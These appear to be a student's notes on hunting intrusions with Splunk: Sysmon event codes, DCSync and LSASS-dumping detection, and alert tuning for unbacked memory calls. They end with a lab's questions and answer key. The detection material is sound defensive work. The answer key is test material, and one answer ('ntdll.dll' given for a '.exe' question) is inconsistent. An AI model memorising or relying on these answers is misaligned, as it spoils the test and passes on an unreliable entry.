Intrustion Detection with Splunk
Last updated
Last updated
The most imporant thing at the begining is to lower the volume of logs.
Some queries can take more time to load than others, although the returned lgos are the exact same. That is because if for example we specify to search for security logs and an EventCode that occurs only in security logs, and in another query we only specify the EventCode and not the source, we will get the same result, but splunk in the first example knows where to look, while in the second it looks through all the logs. Thus, taking more time to return the result of the query.
all possible instances of uniwaldo.local (Computer Name)
all possible instances of uniwaldo.local using wildcards (takses more time)
This search takes a lot of time because it searches for uniwaldo.local in all fields as a value. But we know its a computer name, so we can make it easyer for splunk by specifying the field.
all possible instances of uniwaldo.local using wildcards in ComputerName field
Sysmon Event Codes provide detailed logging of system activities, useful for detecting anomalies.
Parent-Child Process Relationships can reveal malicious execution chains (e.g., notepad.exe spawning powershell.exe).
DCSync Attack Detection involves monitoring Active Directory replication events (EventCode=4662 with Access_Mask=0x100).
LSASS Dumping can be detected using EventCode=10 (Process Access) targeting lsass.exe.
Efficient Searching in Splunk involves:
Filtering by sourcetype and EventCode to reduce search time.
Using wildcards (*) carefully to avoid performance issues.
Specifying fields (e.g., ComputerName) instead of raw text searches.
Identifies which Sysmon events are logged in the environment.
Lists all process creation events with parent-child relationships.
cmd.exe, powershell.exe)Focuses on suspicious execution chains.
notepad.exe Spawning powershell.exe10.0.0.229)Identifies all logs related to the suspicious IP.
waldo-virtual-machine)Checks if the Linux system is involved in malicious activity.
Lists commands executed on Windows hosts from the suspicious IP.
Identifies potential DCSync attempts (replication of AD secrets).
Lists processes accessing lsass.exe (common in credential dumping).
notepad.exe Accessing LSASSChecks if Notepad is being used to dump credentials (highly suspicious).
Start Broad, Then Narrow Down
Begin with general queries (e.g., all Sysmon events), then filter for anomalies.
Focus on High-Value EventCodes
EventCode=1 (process creation), EventCode=10 (process access), and EventCode=4662 (AD replication) are critical for detecting intrusions.
Correlate Suspicious Activity
Combine process anomalies (notepad.exe → powershell.exe) with network connections (10.0.0.229) to uncover attack chains.
Validate Findings
Use additional queries (e.g., Access_Mask=0x100 for DCSync) to confirm malicious activity.
Optimize Searches
Specify sourcetype and fields (e.g., ComputerName) to speed up queries.
Alerting vs. Hunting
Alerting: Proactive detection with low false positives.
Hunting: Exploratory analysis to uncover hidden threats.
Goal: Avoid alert fatigue by minimizing noise while catching real threats.
Detecting Malicious API Calls from UNKNOWN Memory Regions
Shellcode often executes from unbacked memory (UNKNOWN in call stacks).
Legitimate processes (e.g., JIT compilers) may also trigger UNKNOWN calls (false positives).
Optimizing Alerts
Exclude known benign processes (e.g., .NET, Explorer.exe, WOW64).
Focus on high-risk behaviors (e.g., ProcessAccess with UNKNOWN call traces).
Ensure resilience against evasion (e.g., attackers renaming DLLs to bypass filters).
Purpose: Find which EventCode logs contain suspicious memory calls.
Observation: Only EventCode=10 (Process Access) is relevant here.
Purpose: Identify processes making unbacked memory calls.
Common False Positives:
.NET (JIT compilation).
Electron apps (Squirrel.exe).
WOW64 (Windows 32-bit emulation).
Purpose: Ignore processes accessing themselves (often benign).
Purpose: Remove noise from legitimate applications.
Key Exclusions:
.NET (clr.dll, ni.dll).
WOW64 (32-bit emulation).
Explorer.exe (too noisy).
Purpose: Detect only suspicious process access from unbacked memory.
Output:
SourceImage (malicious process).
TargetImage (process being accessed, e.g., lsass.exe).
CallTrace (full API call stack).
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data the other process that dumped lsass. Enter its name as your answer. Answer format: _____.exe
Answer: ntdll.dll
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the method through which the other process dumped lsass. Enter the misused DLL's name as your answer. Answer format: ______.dll
answer: comsvcs.dll
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: ______.exe
Answer: rundll32.exe
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the two IP addresses of the C2 callback server. Answer format: 10.0.0.1XX and 10.0.0.XX
Answer: 10.0.0.186 and 10.0.0.91
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the port that one of the two C2 callback server IPs used to connect to one of the compromised machines. Enter it as your answer.
Answer: 3389
